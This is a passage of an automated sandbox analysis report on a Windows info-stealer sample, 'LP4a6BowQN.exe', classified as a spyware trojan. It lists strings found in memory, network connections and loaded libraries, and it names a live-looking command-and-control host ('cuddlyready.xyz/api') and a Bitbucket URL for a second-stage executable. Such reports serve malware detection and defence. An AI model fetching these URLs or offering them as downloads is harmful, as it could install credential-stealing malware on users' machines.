                Source: LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662634082.0000000000BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662634082.0000000000BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: LP4a6BowQN.exe, 00000000.00000003.1662983578.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990583895.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: LP4a6BowQN.exe, 00000000.00000003.1662983578.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990583895.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: LP4a6BowQN.exe, 00000000.00000003.1662983578.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990583895.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: LP4a6BowQN.exe, 00000000.00000003.1662983578.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990583895.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                Source: LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                Source: LP4a6BowQN.exeString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: LP4a6BowQN.exe, 00000000.00000003.1662634082.0000000000BFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
                Source: LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3
                Source: LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: LP4a6BowQN.exe, 00000000.00000002.1984216252.00000000006FA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
                Source: LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B82000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeX
                Source: LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exed
                Source: LP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                Source: LP4a6BowQN.exe, 00000000.00000003.1474687846.0000000005496000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: LP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: LP4a6BowQN.exe, 00000000.00000003.1474687846.0000000005496000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1449717243.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1505886935.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1399489133.0000000000B82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/
                Source: LP4a6BowQN.exe, 00000000.00000003.1520684768.0000000000C13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/7
                Source: LP4a6BowQN.exe, 00000000.00000003.1425120047.000000000549E000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1424948648.0000000005499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/a
                Source: LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1450463340.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1450513722.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1520684768.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1424948648.0000000005499000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1449717243.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1506045565.0000000000C13000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1449804953.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/api
                Source: LP4a6BowQN.exe, 00000000.00000003.1449986604.00000000054A1000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1450463340.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1450513722.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1449717243.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1449804953.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apim
                Source: LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/d
                Source: LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/pi
                Source: LP4a6BowQN.exe, 00000000.00000003.1506045565.0000000000C13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/t
                Source: LP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000B9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/api
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: LP4a6BowQN.exeString found in binary or memory: https://dz8aopenkvv6s.cloudfront.
                Source: LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: LP4a6BowQN.exe, 00000000.00000003.1474687846.0000000005496000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: LP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: LP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: LP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: LP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: LP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: LP4a6BowQN.exe, 00000000.00000003.1474687846.0000000005496000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: LP4a6BowQN.exe, 00000000.00000003.1662983578.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990583895.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: LP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: LP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: LP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: LP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: LP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.7:49764 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 16.182.101.249:443 -> 192.168.2.7:49775 version: TLS 1.2

                System Summary

                barindex
                Source: LP4a6BowQN.exeStatic PE information: section name:
                Source: LP4a6BowQN.exeStatic PE information: section name: .rsrc
                Source: LP4a6BowQN.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1948
                Source: LP4a6BowQN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: LP4a6BowQN.exeStatic PE information: Section: ZLIB complexity 0.9974582619863014
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@3/3
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7624
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\7cd8ee41-2b51-4a0d-a647-65f181f050c9Jump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: LP4a6BowQN.exe, 00000000.00000003.1400773859.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400579820.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1426977779.00000000054C7000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1427362016.00000000054BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: LP4a6BowQN.exeReversingLabs: Detection: 57%
                Source: LP4a6BowQN.exeVirustotal: Detection: 58%
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile read: C:\Users\user\Desktop\LP4a6BowQN.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\LP4a6BowQN.exe "C:\Users\user\Desktop\LP4a6BowQN.exe"
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1948
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: uxtheme.dllJump to behavior
